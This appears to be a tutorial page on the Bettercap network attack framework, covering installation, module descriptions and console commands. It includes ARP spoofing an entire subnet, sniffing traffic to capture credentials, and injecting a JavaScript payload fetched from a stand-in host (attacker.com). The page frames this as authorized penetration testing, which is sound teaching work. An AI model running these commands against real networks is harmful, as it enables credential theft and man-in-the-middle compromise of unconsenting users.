Bettercap — Network Attacks & MITM Framework

What is Bettercap?

Bettercap is a powerful, modular network attack and monitoring framework written in Go. It is designed as the modern successor to ettercap and covers a wide range of attack surfaces: Ethernet LAN (ARP spoofing, MITM), 802.11 WiFi (deauth, handshake capture, probe sniffing), Bluetooth Low Energy (BLE enumeration), and HID injection. It features both an interactive CLI and a built-in web interface, making it one of the most versatile tools for authorized network security assessments.

⚠ Legal Notice

Only use on systems you own or have explicit written permission to test. Unauthorized use violates Pakistan's PECA 2016 and international cybercrime laws.

Installation

# Update packages
sudo apt update

# Install Bettercap (pre-installed on Kali)
sudo apt install bettercap -y

# OR install latest via Go
go install github.com/bettercap/bettercap@latest

# Update Bettercap's caplet and module list
sudo bettercap -eval "caplets.update; ui.update; quit"

# Verify
bettercap --version

Basic Usage

Bettercap uses an interactive REPL console with modules that are toggled on/off. Run as root — it requires raw socket access.

# Launch on a specific network interface
sudo bettercap -iface eth0

# Launch with the built-in web UI (browser at http://127.0.0.1:80)
sudo bettercap -caplet http-ui

# Run a caplet (pre-written attack script) directly
sudo bettercap -caplet mitm.cap

# Inside the interactive console:
# Discover all hosts on the network
net.probe on
net.show

# Start ARP spoofing against all hosts (full MITM)
set arp.spoof.fullduplex true
set arp.spoof.targets 192.168.1.0/24
arp.spoof on

# Enable HTTP/S sniffing to capture credentials
net.sniff on

# Inject a JavaScript payload into HTTP responses
set http.proxy.injectjs http://attacker.com/payload.js
http.proxy on

Key Modules

net.probe — Actively discover live hosts on the local network
arp.spoof — ARP cache poisoning for MITM positioning
net.sniff — Passive packet capture and credential extraction
http.proxy — Transparent HTTP proxy with JS/HTML injection support
https.proxy — HTTPS proxy via SSL stripping (requires valid cert setup)
dns.spoof — Redirect DNS queries to attacker-controlled IPs
wifi — 802.11 monitor mode, deauth attacks, handshake capture
ble.recon — Scan and enumerate nearby Bluetooth Low Energy devices

Common Use Cases

Authorized LAN penetration testing and MITM assessments
CTF (Capture The Flag) competitions involving network traffic
Internal red team wireless and wired network audits
Security awareness demonstrations (credential interception on HTTP)

Tips & Best Practices

Always enable arp.spoof.fullduplex before starting ARP spoofing — without it you only poison one direction and traffic analysis will be incomplete. Use caplets (pre-written .cap scripts) to automate repeatable attack chains instead of typing commands manually each session. The community caplet repository on GitHub contains ready-made scripts for common scenarios like credential harvesting and network recon.

Practice on legal targets like TryHackMe, HackTheBox, or hackzia.site labs before using in live engagements.